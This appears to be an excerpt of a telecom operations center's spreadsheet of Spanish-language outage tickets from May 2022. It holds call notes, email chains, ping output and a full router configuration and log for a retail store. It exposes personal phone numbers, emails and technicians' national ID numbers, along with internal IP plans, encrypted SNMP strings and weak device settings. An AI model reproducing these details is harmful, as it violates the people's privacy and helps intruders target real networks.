PARA: CASTAÑEDA CUEVAS CARLOS EMILIO &lt;CCCUEVAS@UNINET.COM.MX&gt;; PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE :: || CNOC TICKET IMGMD005147 || ID LOCAL 1525889OH || ENLACE CAÍDO
ESTIMADOS,
TENEMOS AL LCON JESUS ALBERTO MOLINA   +504 9452-2521    HORARIOS   6 AM A 8 PM
SALUDOS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JESUS ALBERTO MOLINA   +504 9452-2521 INDICA QUE NO CUENTAN CON ENERGIA EN EL LUGAR SOLICITA QUE SE LE LLAME A LAS 10:00 AM**
ID 2001491318
**</t>
  </si>
  <si>
    <t>F4579129</t>
  </si>
  <si>
    <t>SE HABLÓ CON WALTER REYES/CLIENTE 45787911 SE LE EXPLICA EL ESCENARIO QUE SE DICE EN CRONO ANTERIOR, HAY SEGUIMIENTO TAMBIÉN VÍA CORREO; CLIENTE AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>NO SE LLEGA AL CPE DEL CLIENTE
ZAPOTE#PING 200.119.138.58
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 200.119.138.58, TIMEOUT IS 2 SECONDS:
.....
SUCCESS RATE IS 0 PERCENT (0/5)
PE 10.184.12.9
ZAPOTE#SHOW INT DES | IN 1886
VL1886                         UP             UP       INFO 2MB POLLO CAMPERO C687
ZAPOTE#SHOW RUN INT VLA 1886
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 185 BYTES
!
INTERFACE VLAN1886
 DESCRIPTION INFO 2MB POLLO CAMPERO C687
 IP ADDRESS 200.119.138.57 255.255.255.248
 SERVICE-POLICY INPUT RESTRICCION_2M
 SERVICE-POLICY OUTPUT RESTRICCION_2M
END
ZAPOTE#
ZAPOTE#
ZAPOTE#</t>
  </si>
  <si>
    <t>SE TIENE COORDINADA VISITA PARA LAS 8:00 AM SE COLOCA EN ETAPA PENDIENTE CLIENTE HASTA QUE ABRAN EL RESTAURANTE A LAS 8:00 AM</t>
  </si>
  <si>
    <t>***--- TOMAR EN CUENTA QUE PARA ESTE CASO YA SE TIENE VISITA COORDINADA POR JAYME  HERNANDEZ DEL CNOC ---****
DE: ERICK SANCHEZ [MAILTO:ERICK.SANCHEZS@SOMOSCMI.COM]
ENVIADO EL: JUEVES, 26 DE MAYO DE 2022 17:39
PARA: WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; PABLO MIGUEL ERNESTO JUAREZ HERNANDEZ &lt;PABLOM.JUAREZ@CLARO.COM.GT&gt;
CC: HELPDESK. &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; C687-GT@CAMPERO.COM; WERNER DENIS HERNANDEZ POP &lt;WERNER.HERNANDEZ@SOMOSCMI.COM&gt;
ASUNTO: RE: C687 - CAIDO SERVICIO INTERNET CLARO - 38300538
HOLA WALTER BUENAS TARDES,
YA PUEDEN INGRESAR , TOMAR EN CUANTA QUE RESTAURANTE SOLO OPERAR DE 8AM A 8PM.
SALUDOS,
 	ERICK SANCHEZ
JEFE TI DE SOPORTE
ERICK.SANCHEZS@SOMOSCMI.COM
CMI ALIMENTOS	
CMI LA FUERZA QUE NOS UNE PARA TRASCENDER
WWW.SOMOSCMI.COM
LEGAL/PRIVACY
DE: WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;
ENVIADO EL: JUEVES, 26 DE MAYO DE 2022 17:12
PARA: JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; PABLO MIGUEL ERNESTO JUAREZ HERNANDEZ &lt;PABLOM.JUAREZ@CLARO.COM.GT&gt;
CC: HELPDESK. &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; ERICK SANCHEZ &lt;ERICK.SANCHEZS@SOMOSCMI.COM&gt;
ASUNTO: RE: C687 - CAIDO SERVICIO INTERNET CLARO - 38300538
BUENA TARDE,  POR EL APOYO JAIME.
FAVOR ERICK NOS APOYAS CON EL PERMISO DE ACCESO.
SALUDOS,
 	WALTER ANIBAL REYES
ADMINISTRADOR DE PROYECTOS
WALTER.REYES@SOMOSCMI.COM
CMI ALIMENTOS	
CMI LA FUERZA QUE NOS UNE PARA TRASCENDER
WWW.SOMOSCMI.COM
LEGAL/PRIVACY
DE: JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;
ENVIADO EL: JUEVES, 26 DE MAYO DE 2022 17:07
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; PABLO MIGUEL ERNESTO JUAREZ HERNANDEZ &lt;PABLOM.JUAREZ@CLARO.COM.GT&gt;
CC: HELPDESK. &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: C687 - CAIDO SERVICIO INTERNET CLARO - 38300538
ESTIMADO CLIENTE
   HACEMOS DE SU CONOCIMIENTO, QUE PERSONAL SE DIRIGE A PDV, EL PERSONAL ES
AXEL DANILO  ZARPEC
MILTON MORATAYA
AGRADECEMOS SU APOYO.
SALUDOS
ENVIADO DESDE CORREO PARA WINDOWS</t>
  </si>
  <si>
    <t>F4579151</t>
  </si>
  <si>
    <t>***---SE TEINE COLA DE CORREOS DEL CLIENTE POR LO QUE SE LE CONFIRMA DE LA APERTURA DEL TICKET Y SE LE INDICA QUE SE ESTA REALIZANDO DIAGNOSTICO POR PARTE DELL CNOC -**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: VIERNES, 27 DE MAYO DE 2022 05:24
PARA: CARLOS DAVID LOPEZ PORTILLO &lt;CDLOPEZ@GILDAN.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: OSCAR WILSON &lt;OWILSON@GILDAN.COM&gt;; PABLO ESCAMILLA &lt;PESCAMILLA@GILDAN.COM&gt;; DENIS ENRIQUE TRIMINIO &lt;DETRIMINIO@GILDAN.COM&gt;; NILLS LEIVA &lt;NLEIVA@GILDAN.COM&gt;; MANUEL ANTONIO MARTINEZ HERNANDEZ &lt;MAMARTINEZ@GILDAN.COM&gt;; ANTONIO PEREZ-BENNETT &lt;APEREZB@GILDAN.COM&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; *IT, MANUFACTURING HELPDESK TEAM &lt;ITMANUFACTURINGHELPDESKTEAM@GILDAN.COM&gt;; *HELPDESKTEAM, HONDURAS &lt;HELPDESKTEAMHONDURAS@GILDAN.COM&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;
ASUNTO: RE: ENLACE CLARO GILDAN NUEVOS HORIZONTES
BUENOS DÍAS ESTIMADO SR. LOPEZ.
                RESPECTO A SU SOLICITUD, SE VISUALIZA QUE EL TICKET ESTÁ ASIGNADO AL PERSONAL DEL CNOC CLARO.
ACTUALMENTE ESTÁN REALIZANDO EL DIAGNOSTICO, POR LO QUE ESPERAMOS ESTAR COMPARTIENDO AVANCES A LA BREVEDAD POSIBLE.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: CARLOS DAVID LOPEZ PORTILLO [MAILTO:CDLOPEZ@GILDAN.COM]
ENVIADO EL: VIERNES, 27 DE MAYO DE 2022 05:19
PARA: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: OSCAR WILSON &lt;OWILSON@GILDAN.COM&gt;; PABLO ESCAMILLA &lt;PESCAMILLA@GILDAN.COM&gt;; DENIS ENRIQUE TRIMINIO &lt;DETRIMINIO@GILDAN.COM&gt;; NILLS LEIVA &lt;NLEIVA@GILDAN.COM&gt;; MANUEL ANTONIO MARTINEZ HERNANDEZ &lt;MAMARTINEZ@GILDAN.COM&gt;; ANTONIO PEREZ-BENNETT &lt;APEREZB@GILDAN.COM&gt;; *IT, MANUFACTURING HELPDESK TEAM &lt;ITMANUFACTURINGHELPDESKTEAM@GILDAN.COM&gt;; *HELPDESKTEAM, HONDURAS &lt;HELPDESKTEAMHONDURAS@GILDAN.COM&gt;
ASUNTO: RE: ENLACE CLARO GILDAN NUEVOS HORIZONTES
SE CONTACTO AL 2205-4847, SE NOS APERTURO EL TICKET 1129530
CARLOS LOPEZ
CLERK IT HELPDESK</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. GERSON BARAHONA 32851285 NO CONTESTO IVR ENVIA A BUZON,  ID: 2001577169 ...</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. GERSON BARAHONA 32851285 INFORMA QUE YA VALIDO QUE LOS EQUIPOS ESTAN ENCENDIDOS, PERO NO PUDO APLICAR REINICIO PORQUE HAY UNA JUNTA DE LOS DIRECTIVOS EN LA SALA DE REUNIONES AHI SE ENCUENTRA EL CUARTO DE DATOS, SOLICITA QUE SE REVISE A NIVEL DE PLANTA EXTERNA Y DE SER NECESARIO EL INGRESO AL SITIO REMOTO QUE LE LLAMEN PARA AUTORIZAR LA VISITA MAÑANA SABADO EN HORARIO QUE INDIQUE.</t>
  </si>
  <si>
    <t>**SE LLAMA A LA SEÑORITA KENIA LOPEZ AL 504 31700735 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001505313
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GERSON BARAHONA 32851285 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE TRATA DE DEJAR EN CONFERENCIA CON GESTOR PERO CLIENTE CORTA LA LLAMADA
-ID 2001563784</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KENIA LOPEZ 50431700735 QUIEN SOLICITA SE LLAME A  GERSON BARAHONA 32851285
-ID 2001560613</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS LOPEZ AL 504 32795970 INDICA QUE YA SALIO DE TURNO SOLICITA QUE SE LE LLAME A LA SEÑORITA KENIA LOPEZ AL 504 31700735 **
-ID 2001492637
**</t>
  </si>
  <si>
    <t>**SE LLAMA A LA SEÑORITA KENIA LOPEZ AL 504 31700735 SIGUE SIN RESPONDER, SE INTENTARA LUEGO **
ID 2001539752
**</t>
  </si>
  <si>
    <t>**SE LLAMA A LA SEÑORITA KENIA LOPEZ AL 504 31700735 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001492818
**</t>
  </si>
  <si>
    <t>VISITA PARA MAÑANA SABADO 8:00 HRS ||
SE LLAMA A CONTACTO EN SITIO:::: CARLOS LOPEZ 504 32795970 NO CONTESTA / 31700735 A ESTE NUMERO CONTESTAN PERO INDICAN QUE NO ES CON ELLA, QUE SE LLAME A GERSON BARAHONA 50432851285 QUIEN INDICA QUE SE PUEDE ATENDER EN SITIO REMOTO A LAS 8 HRS, CUALQUIER DUDA O SEGUIMIENTO MAÑANA ES CON EL
2001675185
COLA:
NOMBRE: A: 50431700735
NÚMERO: 50431700735
DURACIÓN: 0:01:52
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50431700735
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 27/05/2022 16:34:13
2001675997
COLA:
NOMBRE: A: 50432851285
NÚMERO: 50432851285
DURACIÓN: 0:02:27
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 50432851285
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 27/05/2022 16:37:10</t>
  </si>
  <si>
    <t>||| SE LE ENVIA CORREO A CLIENTE SOLICITANDO ACCESOS ||
ASUNTO: RE: [EXTERNAL]RE: ENLACE CLARO GILDAN NUEVOS HORIZONTES
EN SEGUIMIENTO AL SERVICIO REPORTADO 1403317OH || GILDAN HONDURAS TRADING - || NUEVOS HORIZONTES BUSINESS CENTER RANCHO EL COCO .
LE COMENTO QUE SE ESTÁ COORDINANDO UNA VISITA TÉCNICA PARA EL DÍA DE MAÑANA SÁBADO 28/05, SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR LOS ACCESOS CORRESPONDIENTES PARA EL PERSONAL TÉCNICO.
PERSONAL DE SEL:
JOHN RAMOS    0501-1995-07643
HUGO PINEDA   0501-2000-09002
ORLIN FUENTES 1618-1986-00852
OSCAR PAZ   0501-2000-11392
LUIS AMAYA   0501-2001-01539
QUEDAMOS ATENTOS A SU CONFIRMACIÓN.
SALUDOS CORDIALES,</t>
  </si>
  <si>
    <t>F4579157</t>
  </si>
  <si>
    <t>SERVICIO OPERATIVO SE VALIDA QUE SE TUVO UN FLAP EN LA ADYACENCIA DEL SISTEMA AUTONOMO AL CUAL OPEORTENECE EL CIRCUITO DEL CLIENTE .
DISPLAY LOGBUFFER
LOGGING BUFFER CONFIGURATION AND CONTENTS: ENABLED
ALLOWED MAX BUFFER SIZE: 1024
ACTUAL BUFFER SIZE: 512
CHANNEL NUMBER: 4, CHANNEL NAME: LOGBUFFER
DROPPED MESSAGES: 0
OVERWRITTEN MESSAGES: 121
CURRENT MESSAGES: 512
MAY 27 2022 05:03:25-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[0]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)
MAY 27 2022 03:54:58-06:00 CC_WALMART_CR_TIENDA_3078 %%01NTP/4/PEER_SELE(L)[1]:THE PEER SELECTED BY THE SYSTEM IS 10.201.41.193.
MAY 27 2022 03:37:48-06:00 CC_WALMART_CR_TIENDA_3078 %%01NTP/4/PEER_SELE(L)[2]:THE PEER SELECTED BY THE SYSTEM IS 10.201.11.193.
MAY 27 2022 03:22:49-06:00 CC_WALMART_CR_TIENDA_3078 %%01NTP/4/PEER_SELE(L)[3]:THE PEER SELECTED BY THE SYSTEM IS 10.201.41.193.
MAY 27 2022 03:12:53-06:00 CC_WALMART_CR_TIENDA_3078 %%01OSPF/3/NBR_DOWN_REASON(L)[4]:NEIGHBOR STATE LEAVES FULL OR CHANGED TO DOWN. (PROCESSID=65410, NEIGHBORROUTERID=22.34.159.67, NEIGHBORAREAID=0, NEIGHBORINTERFACE=GIGABITETHERNET0/0/1,NEIGHBORDOWNIMMEDIATE REASON=NEIGHBOR DOWN DUE TO INACTIVITY, NEIGHBORDOWNPRIMEREASON=HELLO NOT SEEN, NEIGHBORCHANGETIME=2022-05-27 03:12:53-06:00)
MAY 27 2022 03:12:53-06:00 CC_WALMART_CR_TIENDA_3078 %%01OSPF/3/NBR_CHG_DOWN(L)[5]:NEIGHBOR EVENT:NEIGHBOR STATE CHANGED TO DOWN. (PROCESSID=65410, NEIGHBORADDRESS=22.32.3.222, NEIGHBOREVENT=INACTIVITYTIMER, NEIGHBORPREVIOUSSTATE=FULL, NEIGHBORCURRENTSTATE=DOWN)
MAY 27 2022 03:01:30-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[6]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)
MAY 27 2022 02:10:10-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[7]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)
MAY 27 2022 01:39:52-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[8]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)
MAY 27 2022 00:52:53-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[9]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)
MAY 27 2022 00:35:54-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[10]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)
MAY 26 2022 22:38:01-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[11]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 3 SEMANAS.
HUAWEI VERSATILE ROUTING PLATFORM SOFTWARE
VRP (R) SOFTWARE, VERSION 5.170 (AR120 V200R009C00SPC500)
COPYRIGHT (C) 2011-2018 HUAWEI TECH CO., LTD
HUAWEI AR129CGVW-L ROUTER UPTIME IS 3 WEEKS, 0 DAY, 22 HOURS, 53 MINUTES
MPU 0(MASTER) : UPTIME IS 3 WEEKS, 0 DAY, 22 HOURS, 51 MINUTES
SDRAM MEMORY SIZE    : 512     M BYTES
FLASH 0 MEMORY SIZE  : 512     M BYTES
MPU VERSION INFORMATION :
1. PCB      VERSION  : AR129CGVW-L VER.C
2. MAB      VERSION  : 0
3. BOARD    TYPE     : AR129CGVW-L
4. BOOTROM  VERSION  : 1
&lt;CC_WALMART_CR_TIENDA_3078&gt;
CONFIGURACION DEL CPE:
DISPLAY  CURRENT-CONFIGURATION
[V200R009C00SPC500]
#
 SYSNAME CC_WALMART_CR_TIENDA_3078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UNDO ANTI-ATTACK ABNORMAL ENABLE
UNDO ANTI-ATTACK FRAGMENT ENABLE
UNDO ANTI-ATTACK ICMP-FLOOD ENABLE
UNDO ANTI-ATTACK TCP-SYN ENABLE
UNDO ANTI-ATTACK UDP-FLOOD ENABLE
#
 LLDP ENAB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3.220 0.0.0.3
#
ACL NAME TELNET 3999
 RULE 10 PERMIT IP SOURCE 10.0.0.0 0.255.255.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ETHERNET0/0/0
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/0
 UNDO PORTSWITCH
 DESCRIPTION WAN_PRINCIPAL_CONTR0001582910OC
 SET FLOW-STAT INTERVAL 30
 BANDWIDTH 2
 UNDO ICMP HOST-UNREACHABLE SEND
 UNDO ICMP PORT-UNREACHABLE SEND
 UNDO ICMP TTL-EXCEEDED SEND
#
INTERFACE GIGABITETHERNET0/0/0.1108
 DESCRIPTION WAN_PUNTO_VENTA_HACIA_MTR105
 DOT1Q TERMINATION VID 1108
 IP ADDRESS 10.201.11.222 255.255.255.192
#
INTERFACE GIGABITETHERNET0/0/0.2108
 DESCRIPTION WAN_PUNTO_VENTA_HACIA_MTR488
 DOT1Q TERMINATION VID 2108
 IP ADDRESS 10.201.41.222 255.255.255.192
#
INTERFACE GIGABITETHERNET0/0/1
 UNDO PORTSWITCH
 DESCRIPTION LAN DEL CLIENTE
 SET FLOW-STAT INTERVAL 30
 IP ADDRESS 22.32.3.221 255.255.255.252
 OSPF NETWORK-TYPE P2P
 OSPF TIMER DEAD 60
#
INTERFACE GIGABITETHERNET0/0/2
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/3
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/4
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/5
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE WLAN-BSS7
 DESCRIPTION LIBRE
 PORT HYBRID TAGGED VLAN 1
#
INTERFACE CELLULAR0/0/0
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE NULL0
 DESCRIPTION LIBRE
#
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.99.77.233 255.255.255.255
#
BGP 64529
 ROUTER-ID 10.99.77.233
 PEER 10.201.11.193 AS-NUMBER 14754
 PEER 10.201.41.193 AS-NUMBER 14754
 #
 IPV4-FAMILY UNICAST
  UNDO SYNCHRONIZATION
  NETWORK 10.99.77.233 255.255.255.255
  IMPORT-ROUTE OSPF 65410
  PEER 10.201.11.193 ENABLE
  PEER 10.201.11.193 ROUTE-POLICY LOCAL_PREFERENCE IMPORT
  PEER 10.201.11.193 ROUTE-POLICY LOCAL_PREFERENCE EXPORT
  PEER 10.201.11.193 NEXT-HOP-LOCAL
  PEER 10.201.41.193 ENABLE
  PEER 10.201.41.193 NEXT-HOP-LOCAL
#
OSPF 65410
 DEFAULT-ROUTE-ADVERTISE
 IMPORT-ROUTE DIRECT
 AREA 0.0.0.0
  NETWORK 22.32.3.220 0.0.0.3
#
ROUTE-POLICY OSPF_DATOS_WALMART PERMIT NODE 10
 IF-MATCH ACL 2999
#
ROUTE-POLICY LOCAL_PREFERENCE PERMIT NODE 10
 APPLY LOCAL-PREFERENCE 200
#
CPU-DEFEND POLICY ICPM
CPU-DEFEND POLICY ICMP
 PACKET-TYPE ICMP RATE-LIMIT 32000
 PACKET-TYPE ICMP PRIORITY 4
#
 CPU-DEFEND-POLICY ICMP
#
 SNMP-AGENT LOCAL-ENGINEID 800007DB0340EEDDF2B5CC
 SNMP-AGENT COMMUNITY READ %^%#UW2U@GJSC!(AME):XJ61.),8LY%D*R/XKQ,LUPCVTPFJ-7END@*|$+1[Q5G%!:NNO$V:GFMMC^-F8&amp;ZW%^%# ACL 2988
 SNMP-AGENT COMMUNITY READ %^%#VHPXM6=PO2GLYFL&amp;2L1#K:^0/QD0{ME_QT8|RJZOPZ#-0}TQOWEBN.N#}G@CEH.I#&gt;(&lt;M@P-J$=D3OX"%^%#
 SNMP-AGENT COMMUNITY READ %^%#AHORH&gt;DD2YWE@{S5GZ_E;^|V@1DWH48H*GK)1^I&gt;:BD"JCCL&lt;"0HB3PM,.~6NNRTM,FIMWP-IZV`JQPI%^%#
 SNMP-AGENT SYS-INFO LOCATION PALI PARAISO
 SNMP-AGENT SYS-INFO VERSION V2C
 SNMP-AGENT TRAP SOURCE LOOPBACK5
 SNMP-AGENT
#
 STELNET SERVER ENABLE
 TELNET SERVER ENABLE
#
 SET WEB LOGIN-STYLE SIMPLE
 HTTP SECURE-SERVER SSL-POLICY DEFAULT_POLICY
 HTTP SERVER ENABLE
 HTTP SECURE-SERVER ENABLE
#
IP ROUTE-STATIC 0.0.0.0 0.0.0.0 10.201.11.193
#
FIB REGULARLY-REFRESH DIS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RADIO-PROFILE ID 0
#
INTERFACE WLAN-RADIO0/0/1
 DESCRIPTION LIBRE
#
DOT1X-ACCESS-PROFILE NAME DOT1X_ACCESS_PROFILE
#
MAC-ACCESS-PROFILE NAME MAC_ACCESS_PROFILE
#
 NTP-SERVICE UNICAST-PEER 10.201.41.193
 NTP-SERVICE UNICAST-PEER 10.201.11.193
#
VOICE
 #
 DIAGNOSE
#
OPS
#
AUTOSTART
#
SECELOG
#
RETURN
&lt;CC_WALMART_CR_TIENDA_3078&gt;
LOG DEL ROUTER CPE:
DISPLAY LOGBUFFER
LOGGING BUFFER CONFIGURATION AND CONTENTS: ENABLED
ALLOWED MAX BUFFER SIZE: 1024
ACTUAL BUFFER SIZE: 512
CHANNEL NUMBER: 4, CHANNEL NAME: LOGBUFFER
DROPPED MESSAGES: 0
OVERWRITTEN MESSAGES: 121
CURRENT MESSAGES: 512
MAY 27 2022 05:03:25-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[0]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)
MAY 27 2022 03:54:58-06:00 CC_WALMART_CR_TIENDA_3078 %%01NTP/4/PEER_SELE(L)[1]:THE PEER SELECTED BY THE SYSTEM IS 10.201.41.193.
MAY 27 2022 03:37:48-06:00 CC_WALMART_CR_TIENDA_3078 %%01NTP/4/PEER_SELE(L)[2]:THE PEER SELECTED BY THE SYSTEM IS 10.201.11.193.
MAY 27 2022 03:22:49-06:00 CC_WALMART_CR_TIENDA_3078 %%01NTP/4/PEER_SELE(L)[3]:THE PEER SELECTED BY THE SYSTEM IS 10.201.41.193.
MAY 27 2022 03:12:53-06:00 CC_WALMART_CR_TIENDA_3078 %%01OSPF/3/NBR_DOWN_REASON(L)[4]:NEIGHBOR STATE LEAVES FULL OR CHANGED TO DOWN. (PROCESSID=65410, NEIGHBORROUTERID=22.34.159.67, NEIGHBORAREAID=0, NEIGHBORINTERFACE=GIGABITETHERNET0/0/1,NEIGHBORDOWNIMMEDIATE REASON=NEIGHBOR DOWN DUE TO INACTIVITY, NEIGHBORDOWNPRIMEREASON=HELLO NOT SEEN, NEIGHBORCHANGETIME=2022-05-27 03:12:53-06:00)
MAY 27 2022 03:12:53-06:00 CC_WALMART_CR_TIENDA_3078 %%01OSPF/3/NBR_CHG_DOWN(L)[5]:NEIGHBOR EVENT:NEIGHBOR STATE CHANGED TO DOWN. (PROCESSID=65410, NEIGHBORADDRESS=22.32.3.222, NEIGHBOREVENT=INACTIVITYTIMER, NEIGHBORPREVIOUSSTATE=FULL, NEIGHBORCURRENTSTATE=DOWN)
MAY 27 2022 03:01:30-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[6]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)
MAY 27 2022 02:10:10-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[7]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)
MAY 27 2022 01:39:52-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[8]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)
MAY 27 2022 00:52:53-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[9]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)
MAY 27 2022 00:35:54-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[10]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)
MAY 26 2022 22:38:01-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[11]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)
MAY 26 2022 22:14:42-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[12]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)
MAY 26 2022 19:31:49-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[13]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)
MAY 26 2022 18:36:14-06:00 CC_WALMART_CR_TIENDA_3078 %%01INFO/4/SUPPRESS_LOG(L)[14]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3497857030, MODULENAME=NTP, INFOALIAS=PEER_SELE)
